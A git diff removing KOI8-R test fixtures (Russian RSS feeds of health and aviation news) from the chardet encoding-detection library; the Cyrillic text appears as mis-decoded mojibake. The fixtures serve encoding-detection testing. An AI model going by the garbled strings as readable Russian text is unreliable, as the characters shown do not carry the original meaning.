׀ױֲֹֻּױֵֽ ֱַּ׳ױ ֹ ֻ־ַֹֹ "פֱ־ ׀ִֿ׃ֿ־ֱ־ֹׁ", ׳ ֻֿװֿֿׂ ִֻֿװֿׂ ףֹ־ֵּ״־ֹֻֿ׳ ׀ֱֵַֽֿֿװ ׀ֿ־ׁװ״ ׀ֹֹׂ־ װֱֻֿ ֲִֵ, ֱֻֻ ֱַֹֻּּֽֿֿ, ֹ ׀ֱֻֿ׳ֱֵװ ׀ױװ״ ֱֲֹ׳ֵּ־ֹׁ ֿװ װֿ ֲֵּֿ־ֹ. - - - הֵֹװַֹּֿֿׁ ׳ ׳ֿ׀ֿׂ׃ֱָ ֹ ֿװ׳ֵװֱָ - http://www.aif.ru/online/health/592/14_01 - - ףִֵַֿ־ׁ ־ֱ ׳ֿ׀ֿׂ׃ ֹװֱװֵֵּ ֿװ׳ֱֵֵװ ׳ֱׂ-ִֵֹװַּֿֿ, ִֻֿװֿׂ ֳִֵֹֹֽ־׃ָֹֻ ־ֱױֻ םֱָֹֹּ חימתגץעח. - - - תֱֱֵֻּֽׁ ַּֿֿׂ - http://www.aif.ru/online/health/592/15_01 - - ק <a href="http://www.aif.ru/online/health/591/04_01">׀ִִֵׂױֵֽ ־ֵֵֽֿׂ</a> ֽ ֱׂ׃׃ֱֱֹֻּ ֿ װֽֿ, ֱֻֻ ׀ֿ׳׃ֹװ״ ױ׃װֹֿ׳ֿ׃װ״ ֻ ִָּֿֿױ ׳ִֿױָֿ׀ֿׂ׳ִָֹֿׁ ׀ױװֵ ־ֿ׃ֱ, ֱֻֻ ־ױײ־ֿ ׀ֱׂ׳ֹּ״־ֿ ֱִװ״ ־ֱ ֵֽֿֿׂ. ב װֵ׀ֵׂ״ - ־ֵ׃ֻּֿ״ֻֿ ׃ֿ׳ֵװֿ׳, ֱֻֻ ֱֱֹֻּװ״ ַּֿֿׂ. - - - ף־ֱֵֹֽֽ ױװֵּֽֿ־ֵֹ - http://www.aif.ru/online/health/592/16_02 - - "םֵ־ׁ ֵֿ־״ ױװְּֽֿׁװ ־ֵ װּֿ״ֻֿ ִֹּװֵּ״־ֵ ׀ִֵֹֻֿ ׳ ֱ׳װֲֵֹּֽֿֿ, ־ֿ ֹ ִֵַֹּֿ ׃ִֵֹ־ֹׁ ־ֱ ֱֹּׂ־ַֿֿ ֱִֿׂ ׃ֿ׳ֱֵ־ָֹׁ ֹ ׃ֱֲֿׂ־ָֹׁ. י ֵֵ ֲֵ׃׀ֹֻֿֿװ ֲֵֵֿ ֹ ־ֵׂ׳־ֵֿ ־ֱ׀ׁׂײֵ־ֵֹ, ֱ ׳ ׀ֿ׃ִֵּ־ֵֵ ׳ֵֽׁׂ - ֱִײֵ ַּֿֿ׳־ֵ ֲֹּֿ. ‏װֿ ֽ־ֵ ֽֿײֵװ ׀ֽֿֿ״?" -יַֿׂ״ ף ֿ ֽ ֿ ׳, םֿ׃ֻ׳ֱ - - - קִױּ׃ׁ ײֹ׳ֿװ - http://www.aif.ru/online/health/592/16_04 - - "‏װֿ ׀ֽֿֿײֵװ ׀ֹׂ ׳ִױװֹֹ ײֹ׳ֿװֱ? ‏ֵֽ ־ֱִֿ ׀ֹװֱװ״׃ׁ?" -וֱֻװֵֹׂ־ֱ ם., ןֵּׂ - - - םֿײ־ֿ ֹּ ׀ֵֵֵׂ׃װ״ ׳ֹװֱֹֽ־ֿ׳? - http://www.aif.ru/online/health/592/16_06 - - "ן׃ֵ־״ְ ֹ ֹֽֿ ֵֵֻֽֿׂ־ִױְװ ׀ֹװ״ ֲּֿ״ֵ ׳ֹװֱֹֽ־ֿ׳. ףֱֻײֹװֵ, ֱ ֻ ֵֽױ ֽֿײֵװ ׀ֹׂ׳ֵ׃װֹ ָֹ ׀ֲֵֵֹׂװֻֿ?" -ק. ק ֵ ּ ֹ ֻ ֿ ׳, זֵׁׂ׳ֿ - - - עֱֲֿװֱ ־ֱִ ֱֲֽֿֿׂ - http://www.aif.ru/online/health/592/10_02 - - מֱ׳ֵׂ־ֵֿ, ־ֵװ װֱֻֿ ײֵ־ֹ־, ֻֿװֱֿׁׂ ־ֵ ָֿװֱֵּ ֲ ָֿֿֿׂ ׳ִֵַּׁװ״. ן׃ֲֵֿ־־ֿ ֵָֿװ׃ׁ ׀ֱֲֿֿׂװֱװ״ ־ֱִ ׃׳ֹֽֿ ֱֲֽֿֿׂ ׀ִֵֵׂ ׀ֱִׂ־ֹֻֽֿ. מֱ׃װֵֿׁ ׀ֱֻּֿֿ-׳ׂױֱֻּֿֿ ׃װֱ־ױװ ֱֽ׃ֹֻ ֹ ־ֱװױֱּׂ״־ָ ׀ִֿׂױֻװֿ׳. - - - - diff --git a/chardet/tests/KOI8-R/aug32.hole.ru.xml b/chardet/tests/KOI8-R/aug32.hole.ru.xml deleted file mode 100644 index 7974381..0000000 --- a/chardet/tests/KOI8-R/aug32.hole.ru.xml +++ /dev/null @@ -1,20 +0,0 @@ - - - - - בֱֶֹ פב "32-ֵ ב׳ַױ׃װֱ" - http://aug32.hole.ru/ - בֱֶֹ פב "32-ֵ ב׳ַױ׃װֱ" - - - 18.01.06 - <b>הוזוכפש עו‏י</b>. ףּֿ״־ ֻֿ־ֳֵׂװ.<BR><I>ףֱ־ֻװ נֵװֲֵׂױַׂ. כֿ־ֳֵׂװ־ ֱּ ֻ־ֹײ־ַֿֿ ֱֱַֹֽ־ֱ "גױֻ׳ִֵֿ". מֱ ׀ּ. קֿ׃׃װֱ־ֹׁ.</I> - http://aug32.hole.ru/afisha.htm - - - - - diff --git a/chardet/tests/KOI8-R/aviaport.ru.xml b/chardet/tests/KOI8-R/aviaport.ru.xml deleted file mode 100644 index 00a22f0..0000000 --- a/chardet/tests/KOI8-R/aviaport.ru.xml +++ /dev/null @@ -1,290 +0,0 @@ - - - - - - ב׳ֱֹנֿׂװ.Ru - http://www.aviaport.ru - ב׳ֱֳֹֹׁ ָֹ ׀ֵׂ׳ָ ׂױֻ - - http://www.aviaport.ru/images/aviaport_logo_yandex.gif - ב׳ֱֹנֿׂװ.Ru - http://www.aviaport.ru - - - - מֱִֵ־ װֱֵּ ִ׳ױָ ׀ֲַָֹֹֿ ׳ ֱ׳ֱֱֹֻװֱ׃װֵֶֿׂ ׀ִֿ טֱׂ״ֻֿ׳ֽֿ - http://www.aviaport.ru/news/2006/01/02/99278.html - מֱ װֵֹׂׂװֹֹֿׂ ץֱֹֻׂ־ ֱֲֹּׂ׃ׁ ׃ֱֵּֽֿװ ׃ װֵֽׁׂ ֵּ־ֱֹֽ ֹֻ׀ֱײֱ, ׳ֵּװֵ׳ֹ ֹ םֿ׃ֻ׳. פֱֵּ ִ׳ױָ ׀ֲַָֹֹֿ ׀ִֿ־ׁװ ֹ ֱֵֿׂ כֽֿ׃ּֽֿֿ״׃ֵֻֿ, ֻױֱִ ױ׀ֱּ ׃ֱֵּֽֿװ - Mon, 02 Jan 2006 17:25:00 +0300 - מֱ װֵֹׂׂװֹֹֿׂ ץֱֹֻׂ־ ֱֲֹּׂ׃ׁ ׃ֱֵּֽֿװ ׃ װֵֽׁׂ ֵּ־ֱֹֽ ֹֻ׀ֱײֱ, ׳ֵּװֵ׳ֹ ֹ םֿ׃ֻ׳. פֱֵּ ִ׳ױָ ׀ֲַָֹֹֿ ׀ִֿ־ׁװ ֹ ֱֵֿׂ כֽֿ׃ּֽֿֿ״׃ֵֻֿ, ֻױֱִ ױ׀ֱּ ׃ֱֵּֽֿװ. כֱֻ ׃ֱֲֵֿֿװ ֵֻֿׂׂ׃׀ֿ־ִֵ־װ ֱֵַ־װ׃װ׳ֱ "י־װֱֵֶֻׂ׃-ץֱֹֻׂ־ֱ", ׀ֿ ׀ִֵׂ׳ֱֹׂװֵּ״־ֽ ֱִ־־ֽ, װֿ װֱֵּ ׃װְֱִֵׂ׃׃ ֹ ִֿ־ַֿֿ ֹ ׀ֹּֿװֿ׳. הּׁ ׀ֱִֵֽֿ ׃ֱֵּֽֿװֱ ֿײְֱִֹװ ׀ֲֹׂװֵֹ ֿׂ׃׃ֹ׃ָֹֻ ׃׀ֱֳֵֹֹּ׃װֿ׳. כֱֻ ׃ֲֹֹּֿֿ "י־װֱֵֶֻׂ׃ױ" ׳ ׀ֵׂ׃׃-׃ּױײֲֵ ם‏ף עז, ׳ ׀ֿ־ִֵֵּ״־ֹֻ ׳ 11:16 םףכ ֱֵֻׂװֹ׳־ ׃ֱֵּֽֿװ ֲֹ־ֵ׃ ֱֻּ׃׃ֱ גֱֵ-125, ׳ֵּװֵ׳ֹ ֹ "ֵֵֵֽׂװ״ֵ׳ֿ-1", ױ׀ֱּ ׳ 3-4 ֵֹֻּֽֿװֱָׂ ־ֱִֵֵֻּֿ ֿװ ֱֿׂ׀ֿׂװֱ טֱׂ״ֻֿ׳ֱ. ק ם‏ף ֱֲִֿ׳ֹֹּ, װֿ ֵּ־ ֹֻ׀ֱײֱ - ֱַׂײֱִ־ֵ עֿ׃׃ֹֹ. ףֱֵּֽֿװ ֱֵַֹׂ׃װֹֿׂׂ׳ֱ־ ׳ ֿ׃װֿׂ׳־ֽֿ ַֿ׃ױֱִׂ׃װ׳ֵ בׂױֱֲ. י טֱׂ״ֻֿ׳ֱ ֿ־ ִּֿײֵ־ ֲּ ִֿ׃װֱ׳ֹװ״ װױֹׂ׃װֿ׳ ׳ בּ״׀. כ ׀ֹֿ׃ֻֿ׳ֽ ֱֲֿׂװֱֽ ׀ֹׂ׳ֵֵּ־ ־ֱֵֽ־ֱׁ ׀ֹֿ׃ֻֿ׳ֱׁ ַׂױ׀׀ֱ ֱֿׂ׀ֿׂװֱ "טֱׂ״ֻֿ׳", ׀ֱִִֵֵּֿׂ־ֵֹ ֿ׀ֱֵׂװֹ׳־ֿ-׃׀ֱ׃ֱװֵּ״־ֿ ׃ּױײֲ חץ םֹ־‏ף ׳ טֱׂ״ֻֿ׳׃ֻֿ ֱֲּֿ׃װֹ, ׳ֱִּֿֿ. כִֹֿֿׂ־ְֱֳֹ ׀ֹֿ׃ֻֿ׳ֿ-׃׀ֱ׃ֱװֵּ״־ָ ֱֲֿׂװ ׃ֿ׳ֱֵֵׂװ טֱׂ״ֻֿ׳׃ֹֻ ֵַֹֿׂ־ֱּ״־ ִֹֻֿֿׂ־ֱֳֹֿ־־ ֳֵ־װׂ חֿ׃ױֱִׂ׃װ׳ֵ־־ֿ ֱ׳ֱֳֹֹֿ־־ֿ ׀ֹֿ׃ֻֿ׳ֿ-׃׀ֱ׃ֱװֵּ״־ֿ ׃ּױײֲ םֹ־‏ף ץֱֹֻׂ־. - - - - - נֿװֻֿ ׀ֱ׃׃ֱײֹֿׂ׳ ֵֵׂ ֱֿׂ׀ֿׂװ ֵֹֽ־ֹ גֵ־-חױֹֿׂ־ֱ ׳ֿׂ׃ ־ֱ 11% - http://www.aviaport.ru/news/2006/01/02/99277.html - ק 2005-ֽ ִַֿױ ֵֵׂ ֱֿׂ׀ֿׂװ ֵֹֽ־ֹ גֵ־-חױֹֿׂ־ֱ ׀ֹּֿׂ ׀ֵֹֽׂׂ־ֿ 8,7 ֹֹּּֽֿ־ֿ׳ ׀ֱ׃׃ֱײֹֿׂ׳ ֵֽײִױ־ֱִֿׂ־ָ ֹ ־ֱֳֹֿ־ֱּ״־ָ ֱ׳ֱֹֹּ־ֹ. נֹֿׂׂ׃װ ׀ֿ ׃ֱׂ׳־ֵ־ְֹ ׃ 2004 ִַֽֿֿ ׃ֿ׃װֱ׳ֹּ ֻּֿֿֿ 11% - Mon, 02 Jan 2006 13:29:00 +0300 - ק ׃ִֵַֿ־ׁ־ֵֽ ־ֵֵֽֿׂ The Marker (ֻֿ־ֵֹֽֿ׃ֵֻֿ ׀ֹּֿׂײֵ־ֵֹ ֻ ֱֵַװֵ "חֱֱֳֵׂ") ֲֹּ ֿ׀ױֲֹֻּֿ׳ֱ־ ֱִ־־ֵ ֿ ֿׂ׃װֵ ׀ֿװֱֻֿ ׀ֱ׃׃ֱײֹֿׂ׳ ֵֵׂ ֱֿׂ׀ֿׂװ ֵֹֽ־ֹ הֱ׳ֱִֹ גֵ־-חױֹֿׂ־ֱ.ףֱַּֿ׃־ֿ ׃׳ִֵֵ־ֹֽׁ, ׀ִֵֿׂ׃װֱ׳ֵּ־־ֽ ֱִֹֽ־ֹ׃װֱֳֵֹׂ ֱֿׂ׀ֿׂװֱ, ׳ 2005-ֽ ִַֿױ ֵֵׂ ֱֿׂ׀ֿׂװ ֵֹֽ־ֹ גֵ־-חױֹֿׂ־ֱ ׀ֹּֿׂ ׀ֵֹֽׂׂ־ֿ 8,7 ֹֹּּֽֿ־ֿ׳ ׀ֱ׃׃ֱײֹֿׂ׳ ֵֽײִױ־ֱִֿׂ־ָ ֹ ־ֱֳֹֿ־ֱּ״־ָ ֱ׳ֱֹֹּ־ֹ. נֹֿׂׂ׃װ ׀ֿ ׃ֱׂ׳־ֵ־ְֹ ׃ 2004 ִַֽֿֿ ׃ֿ׃װֱ׳ֹּ ֻּֿֿֿ 11%. נֹֿׂׂ׃װ ־ֱ ֵֽײִױ־ֱִֿׂ־ָ ֱ׳ֱֹֹּ־ָֹׁ ׃ֿ׃װֱ׳ֹּ ׀ֵֹֽׂׂ־ֿ 5,3% ׀ֿ ׃ֱׂ׳־ֵ־ְֹ ׃ ׀ּֽֿׂ ִַֽֿֿ.The Marker ׀ױֲֹֻּױֵװ ֱִ־־ֵ ֱ װֹׂ ־ִֵֵֹּ ֹ ײֹ־ֹ ֱֿׂ׀ֿׂװֱ: 1-21 ֱֲִֵֻׁׂ ֱֿׂ׀ֿׂװ ׀ֹׂ־ּׁ ׀ֵֹֽׂׂ־ֿ 360,7 װ׃ׁ ׀ֱ׃׃ֱײֹֿׂ׳, װֿ ־ֱ 1,4% ׳ֵ ׀ִַּֿֿֿׂ־ֵַֿ ׀ֱֱֻֿװֵּׁ ֱ ֱ־ֱַֹּֿ־ ׀ִֵֹֿׂ. ‏ֹ׃ּֿ ׀ֲֹׂ׳ָֹ ׀ֱ׃׃ֱײֹֿׂ׳ ֵֽײִױ־ֱִֿׂ־ָ ֱ׳ֱֹֹּ־ֹ ׃ֿ׃װֱ׳ֹּֿ ׀ֵֹֽׂׂ־ֿ 176 װ׃ׁ (׀ֹֿׂׂ׃װ ־ֱ 0,7%), ֹ׃ּֿ ׳ֵּװֵ׳ָֹ ׀ֱ׃׃ֱײֹֿׂ׳ ׃ֿ׃װֱ׳ֹּֿ 164,5 װ׃ׁ (׀ֹֿׂׂ׃װ ־ֱ 2,2%).‏װֿ ֱֻ׃ֱֵװ׃ׁ ׳־ױװֵׂ־־ָֹ ֱ׳ֱֹֹּ־ֹ, 1-21 ֱֲִֵֻׁׂ ֵֵׂ ֱֿׂ׀ֿׂװ ֵֹֽ־ֹ גֵ־-חױֹֿׂ־ֱ ׀ֹּֿׂ ׀ֵֹֽׂׂ־ֿ 20,1 װ׃ׁ ׀ֱ׃׃ֱײֹֿׂ׳, װֿ ־ֱ 1,7% ׳ֵ ֱ־ֱַֹּֿ־ַֿֿ ׀ֱֱֻֿװֵּׁ ׳ ׀ִִֵׂױֵֽ ִַֿױ. ה׳ֹײֵ־ֵֹ ׃ֱֵּֽֿװֿ׳ ־ֱ ׳־ױװֵׂ־־ָֹ ֱ׳ֱֹֹּ־ָֹׁ ׃ֿ׃װֱ׳ֹּֿ 428 ׳ֵּװֿ׳ ֹ ׀ֿ׃ֱִֻֿ (׀ֹֿׂׂ׃װ ׳ ֱֵֵֽׂׂ 3,6%). - - - - - הּׁ װױֵ־ֹׁ ׀ֿײֱֿׂ׳ ׳ ףב ׀ֹׂ׳ֵֵּ־ ׳ֵׂװֵּֿװ מֱֳֹֿ־ֱּ״־ֿ ַ׳ֱִֹֹׂ - http://www.aviaport.ru/news/2006/01/02/99276.html - ק ִֵׁׂ װֱװֿ׳ ףב ֲױױְװ ֵּ׃־ֵ ׀ֿײֱׂ. הּׁ ֹֻּ׳ֱֳִֹֹֹ ׀ֿײֱֿׂ׳ ֱִֵ׃װ׳ױְװ׃ׁ ׳ֵׂװֵּֿװ מֱֳֹֿ־ֱּ״־ֿ ַ׳ֱִֹֹׂ װֱװֱ פֱֵָ׃ - Mon, 02 Jan 2006 13:28:00 +0300 - ק ִֵׁׂ װֱװֿ׳ ףב ֲױױְװ ֵּ׃־ֵ ׀ֿײֱׂ, ׃ֲֹֹּֿֿ ׀ִֵׂ׃װֱ׳ֹװֵֹּ ׀ֿײֱׂ־ֿ ׃ּױײֲ ׃װֱׂ־. פֱֻ, ֱַֹֿ ׳ֱַֿֿׂ־ֹ ֱֵַֹׂ׃װֹֿׂׂ׳ֱ־ ׳ װֱװֱָ ןֱֱָֻּֽֿ, פֱֵָ׃ ֹ מ״ְ-םֵֻ׃ֹֻֿ. נֹׂ װֽֿ ׀ֱִּֿ״ ֿװִֵּ״־ָ ׀ֿײֱֿׂ׳ ־ֱ ֱַׂ־ֳֵֹ פֱֵָ׃ ֹ מ״ְ-םֵֻ׃ֹֻֿ ִֿ׃װֱֵַֹװ 20 װ׃. ֱַ. הּׁ ֹֻּ׳ֱֳִֹֹֹ ׀ֿײֱֿׂ׳ ֱִֵ׃װ׳ױְװ׃ׁ ׳ֵׂװֵּֿװ מֱֳֹֿ־ֱּ״־ֿ ַ׳ֱִֹֹׂ װֱװֱ פֱֵָ׃. ן׃־ֿ׳־ֹֽ ׀ֹֹׂ־ֱֹֽ ֵּ׃־ָ ׀ֿײֱֿׂ׳, ׀ִּֿֿׂײְֱָֹ׃ׁ ׃ ֻֿ־ֱֳ ֱֲִֵֻׁׂ 2005 ַ. ׳ ִֵׁׂ ְַֿ-ֱ׀ֱִ־ָ ֱֿׂ־ֱָ ףב, ׁ׳ְּׁװ׃ׁ ֱ׃ױֱָ, ֱ־ֱּֽֿ״־ֿ ׳׃ֱֻֿׁ ִּׁ װַֿֿ ׳ֵֵֽׂ־ֹ ֱִַֿ װֵֽ׀ֱֵׂװױֱׂ ׳ִֿױֱָ ֹ ׃ֹּ״־ ׳ֵװֵׂ, ׀ֱִֵֵֵׂװ בע. - - - - - מֱ ֲֿׂװױ ֱֶׂ־ֳױ׃ַֻֿֿ ׃ֱֵּֽֿװֱ ײֵ־ֹ־ֱ ֱִֹּֿׂ ֲֵֵׂ־ֱֻ - http://www.aviaport.ru/news/2006/01/02/99275.html - מֱ ֲֿׂװױ ׀ֱ׃׃ֱײֹׂ׃ַֻֿֿ ׃ֱֵּֽֿװֱ ֱ׳ֱֹֻֽֿ׀ֱ־ֹֹ Air Austral, ֵּװֵ׳ֵַֿ ֹ זֱׂ־ֳֹֹ ־ֱ ֿ׃װֿׂ׳ עְֵ־״ֿ־, ײֵ־ֹ־ֱ ֱִֹּֿׂ ֲֵֵׂ־ֱֻ - Mon, 02 Jan 2006 13:25:00 +0300 - מֱ ֲֿׂװױ ׀ֱ׃׃ֱײֹׂ׃ַֻֿֿ ׃ֱֵּֽֿװֱ ֱ׳ֱֹֻֽֿ׀ֱ־ֹֹ Air Austral, ֵּװֵ׳ֵַֿ ֹ זֱׂ־ֳֹֹ ־ֱ ֿ׃װֿׂ׳ עְֵ־״ֿ־, ײֵ־ֹ־ֱ ֱִֹּֿׂ ֲֵֵׂ־ֱֻ. םֱּ״ֱֹֻ ־ֱ׳ֱֹּ בּ״-זֱִֵ.װֿ ׀ֹּֿֿֿׂ ֵֵ ׳ ׃ױֲֲֿװױ. נֿ׃ֵּ ׳ֵּװֱ ֹ לֹֿ־ֱ ׃װְֱִֵׂ׃׃ֱ ֱֵֽװֱֹּ, װֿ ײֵ־ֹ־ֱ ׃ֹֻּֽֿ ִַּֿֿ ׃ִֹֹװ ׳ װױֱֵּװֵ. ן־ֱ ׀ֱַּֽֿֿ ׀ֹׂ־ׁװ״ ִֿׂ, ֱ ־ֱִָֹֿ׳ֹ׃ׁ ־ֱ ֲֿׂװױ ׳ֱׂ ׀ֱֵֵֵּׂׂ ׀ױ׀ֿ׳ֹ־ױ.ףֱֽ ׀ֵּֿװ ׀ִּֿֿׂײֱּ׃ׁ ׀ׁװ״ ֱ׃ֿ׳.נֿ ׀ֱׂ׳ֱֹּֽ ֱ׳ֱֹ׀ֵֵׂ׳ֻֿֿ, ײֵ־ֹ־ ׃ ֲֵֵֵֽׂ־־ֿ׃װ״ְ ֲֵֵּֿ ׃ֵֹֽ ֵֽ׃ֳֵׁ׳ ֻ ׀ֵּֿװױ ־ֵ ִֿ׀ױ׃ְֱֻװ׃ׁ. ףֿװׂױִ־ֹֹֻ ֱ׳ֱֹֻֽֿ׀ֱ־ֹֹ ױװ׳ֵׂײְֱִװ, װֿ ֲֵֵֵֽׂ־־ֿ׃װֹ ױ װֿ ײֵ־ֹ־ ־ֵ ֲּֿ ׳ִֹ־ֿ. - - - - - מֱ ׳ֿ׃װֵֻֿ ב׳׃װֱֹֹּׂ ־ֲֵּֿ״ֿ ׃ֱֵּֽֿװ ױ׀ֱּ ׳ ׳ִֵֽֿֿ - http://www.aviaport.ru/news/2006/01/02/99274.html - מֱ ׳ֿ׃װֵֻֿ ב׳׃װֱֹֹּׂ ױ׀ֱּ ׳ ׳ִֿױ ־ֲֵּֿ״ֿ ִֿ־ֽֿֿװֿׂ־ ׃ֱֵּֽֿװ, ׀ֳֹֹּֿׁ ׀ִֿװ׳ֱִֵֹּׂ ֲֵַֹּ״ ׀ׁװֹ ֵּֿ׳ֵֻ. מֱ ֲֿׂװױ ׃ֱֵּֽֿװֱ Cessna-206 ־ֱִָֹֹּֿ׃״ ׃ֵֽ״ ֵּֿ׳ֵֻ - Mon, 02 Jan 2006 13:24:00 +0300 - מֱ ׳ֿ׃װֵֻֿ ב׳׃װֱֹֹּׂ ױ׀ֱּ ׳ ׳ִֿױ ־ֲֵּֿ״ֿ ִֿ־ֽֿֿװֿׂ־ ׃ֱֵּֽֿװ, ׀ֳֹֹּֿׁ ׀ִֿװ׳ֱִֵֹּׂ ֲֵַֹּ״ ׀ׁװֹ ֵּֿ׳ֵֻ, ׃ֱֲֵֿֿװ ֱֵַ־װ׃װ׳ֿ ב׃׃ֹֿװִֵ נֵׂ׃׃.נֿ ֱִ־־ֽ ׀ֳֹֹֹּֿ װֱװֱ כ׳ֹ־׃ֵּ־ִ, ִֵַ ֹ ׀ֵֹּֿֿׂ ֹ־ֳִֵֹ־װ, ־ֱ ֲֿׂװױ ׃ֱֵּֽֿװֱ Cessna-206 ־ֱִָֹֹּֿ׃״ ׃ֵֽ״ ֵּֿ׳ֵֻ - ֵ׃װ״ ׀ֱ׃׃ֱײֹֿׂ׳-׀ְֱֱׂװֹ׃װֿ׳ ֹ ׀ֹּֿװ. ה׳ֱ ֵּֿ׳ֱֵֻ ׳ײֹֹּ, ֿ־ֹ ַֿ׃׀ֹװֱֹֹּֿׂ׳ֱ־, ׃ֱֲֵֿֿװ ׀ֳֹֹּֿׁ.עֱ־ֵֵ ׃ֱֲּֿֿֿ׃״ ֲֿ ִֿ־ֽֿ ׀ֲֵַֹֽֿ.ףֱֵּֽֿװ ױ׀ֱּ ׳ ׳ִֵֽֿֿ ־ֱִֵֵֻּֿ ֿװ ֱִַֿֿׂ י׀׃ױֹ ־ֱ ׳ֿ׃װֵֻֿ װֱװֱ ׃ֱׂױ ײֵ ׀ֿ׃ֵּ ׳ֵּװֱ. נֹֹׂ־ ׀ֹֿׂ׃ִֵֵַֿ ׳ׁ׃־ְׁװ׃ׁ. - - - - - כֱֶֹּֿׂ־ֹׁ: ִ׳ֱ ֵּֿ׳ֱֵֻ ׀ֲַֹֹּֿ ׳ ֵׂױּ״װֱװֵ ֱ׳ֱֱֹֻװֱ׃װֶֿׂ - http://www.aviaport.ru/news/2006/01/02/99273.html - ק ֵׂױּ״װֱװֵ ֻׂױֵ־ֹׁ ׳ ףב, װֱװ בֱִָֿ, ֱ׃װ־ַֿֿ ֱֵֻׂװֹ׳־ַֿֿ ׃ֱֵּֽֿװֱ ׀ֲַֹֹּֿ ִ׳ֱ ֵּֿ׳ֱֵֻ, ־ֱִָֹֿ׳ָֹ׃ׁ ־ֱ ֵַֿ ֲֿׂװױ - Mon, 02 Jan 2006 13:23:00 +0300 - County ׃ֲֹּֿֿ ײױׂ־ֱֹּ׃װֱֽ ֿ װֽֿ, װֿ ׳ ֹֽ־ױ׳ױְ ׀ׁװ־ֳֹױ ׳ ֵׂױּ״װֱװֵ ֻׂױֵ־ֹׁ ֱ׃װ־ַֿֿ ֱֵֻׂװֹ׳־ַֿֿ ׃ֱֵּֽֿװֱ ׀ֲַֹֹּֿ ִ׳ֱ ֵּֿ׳ֱֵֻ, ־ֱִָֹֿ׳ָֹ׃ׁ ־ֱ ֵַֿ ֲֿׂװױ. ֵֶֹׂ ױװֿ־ֹּ, װֿ ֱֻװֱ׃װֱֶֿׂ ׀ֱֹּֿֿׂ ׳ 15 ֵֹֻּֽֿװֱָׂ ֻ ְַױ ֿװ ֵֽ׃װ־ַֿֿ ֱֿׂ׀ֿׂװֱ פֱֹֻׂ, ׳ 14:00 ׳ ׀ׁװ־ֳֹױ.ףּױײֲ ֱֿׂ׀ֿׂװֱ ׀ִֿװ׳ִֵֹֹּׂ, װֿ ׃ֱֵּֽֿװ ֱ׃װ־ֿ ֻֽֿ׀ֱ־ֹֹ, ־ֱ ֲֿׂװױ ֻֿװַֿֿֿׂ ־ֱִָֹֹּֿ׃״, ׀ֿ ֱׂ־ֿ ֹ־ֱֳֶֹֹֽֿׂ, ֵ׃װ״ ֹֹּ ׳ֿ׃ֵֽ״ ֵּֿ׳ֵֻ, ־ֱ׀ֱׂ׳ּּׁ׃ׁ ׳ ֱֿׂ׀ֿׂװ פֱֹֻׂ ֹ פ׳ֹ־-זּּֿ, װֱװ בֱִָֿ. נֿ ־ֵ׳ׁ׃־ֵ־־ֽ ׀ֱֻֿ ׀ֹֹׂ־ֱֽ, ֱֹֽ־ֱ ֵֻֿׂ ֵֹֽ־ֱֹּ ֻױׂ׃, ֱ ֱװֵֽ ׃׳ׁ״ ׃ ־ֵ ׀ֿׂ׀ֱֱּ ֻֿֿ־ֱװֵּ״־ֿ.מֱ׀ֱׂ׳ֵּ־־ֵ ־ֱ ֵֽ׃װֿ ׀ֿ׃ִֵּ־ֵַֿ ֱִֹֿׂ׃ַֹ־ֱֱּ ׃׀ֱ׃ֱװֵֹּ ֲֿ־ֱׂױײֹֹּ ֵַֹֿׁׂ ֲֹֻּֽֿֿ ׃ֱֵּֽֿװֱ. נֱֻֿ ־ֵװ װֿ־ֿ ֹ־ֱֳֶֹֹֽֿׂ ֿ װֽֿ, װֿ ׀ֹּֿֿֿׂ ׃ ֿ׃װֱּ״־ֹֽ ֵּ־ֱֹֽ ֹֻ׀ֱײֱ, ֹ ׀ֱ׃׃ֱײֱֹֹֽׂ, ־ֱִָֹֿ׳ֹֹֽ׃ׁ ־ֱ ֲֿׂװױ ׃ֱֵּֽֿװֱ. ק ־ֱ׃װֵֵֿׁ ׳ֵֽׁׂ ׀ֿ ֱִ־־ֽֿױ ִֵּױ ׳ִֵֵװ׃ׁ ֱׂ׃׃ִֵּֿ׳ֱ־ֵֹ. - - - - - ‏ֹ־ֹװ״ ׃ֱֵּֽֿװ ֱֵֹֹּׂׂ ׳׃ֵֽ ײְֱֵֹּֽ - http://www.aviaport.ru/news/2006/01/02/99272.html - ף 1 ׁ־׳ֱׁׂ 2006 ֱִַֿ ׳ עֿ׃׃ֹֹ ׳׃װױ׀ֹּ ׳ ׃ֹּױ ֱֻֿ־, ֿװֵֽ־ְֹׁ ֱֲֿׁװֵּ״־ֵֿ ֳֵֹּ־ֹֿׂ׳ֱ־ֵֹ 50 ׳ִֹֿ׳ ׀ִֵׂ׀ֹׂ־ֱֹֽװֵּ״׃ֻֿ ִֵׁװֵּ״־ֿ׃װֹ - Mon, 02 Jan 2006 13:22:00 +0300 - ף 1 ׁ־׳ֱׁׂ 2006 ֱִַֿ ׳ עֿ׃׃ֹֹ ׳׃װױ׀ֹּ ׳ ׃ֹּױ ֱֻֿ־, ֿװֵֽ־ְֹׁ ֱֲֿׁװֵּ״־ֵֿ ֳֵֹּ־ֹֿׂ׳ֱ־ֵֹ 50 ׳ִֹֿ׳ ׀ִֵׂ׀ֹׂ־ֱֹֽװֵּ״׃ֻֿ ִֵׁװֵּ״־ֿ׃װֹ, ׃ֱֲֵֿֿװ עיב "מֿ׳ֿ׃װֹ". װֿװ ײֵ ֱֻֿ־ ֱִֵֵּװ ֱֲֿׁװֵּ״־ֽ ֳֵֹּ־ֹֿׂ׳ֱ־ֵֹ ־ֵ׃ֻּֿ״ָֹֻ ׳ִֹֿ׳ ִֵׁװֵּ״־ֿ׃װֹ, ִּׁ ֻֿװָֿׂ ֱׂ־ֵֵ ׃׀ֱֳֵֹּ״־ָ ֱֵֵׂׂ־ֹ ־ֵ װֲֵֿׂ׳ֱּֿ׃״. ק ֱ׃װ־ֿ׃װֹ - ַֹֿׂ־ַֿֿ ֲֹ־ֵ׃ֱ.ףֱַּֿ׃־ֿ ׳׃װױ׀ֹ׳ֵֽױ ׳ ׃ֹּױ ִֻֿױֵֽ־װױ, װֵ׀ֵׂ״ ־ֵ ־ױײ־ֿ ׀ּֿױֱװ״ ֳֵֹּ־ְֹ ׀ִֵׂ׀ֹׂ־ֱֹֽװֵּֽׁ, ֱֻֿ׳ְֱֹֽ ױ׃ּױַֹ ׳ ׃ֵֵֶׂ װױֱֹֽׂ. פֱֻײֵ ֳֵֹּ־ֹׁ ־ֵ ׀ֿ־ֱֲִֹֿװ׃ׁ ִּׁ ׀ֵֵׂ׳ֹֻֿ ׀ֱ׃׃ֱײֹֿׂ׳ ֵַֻּֿ׳ֽ 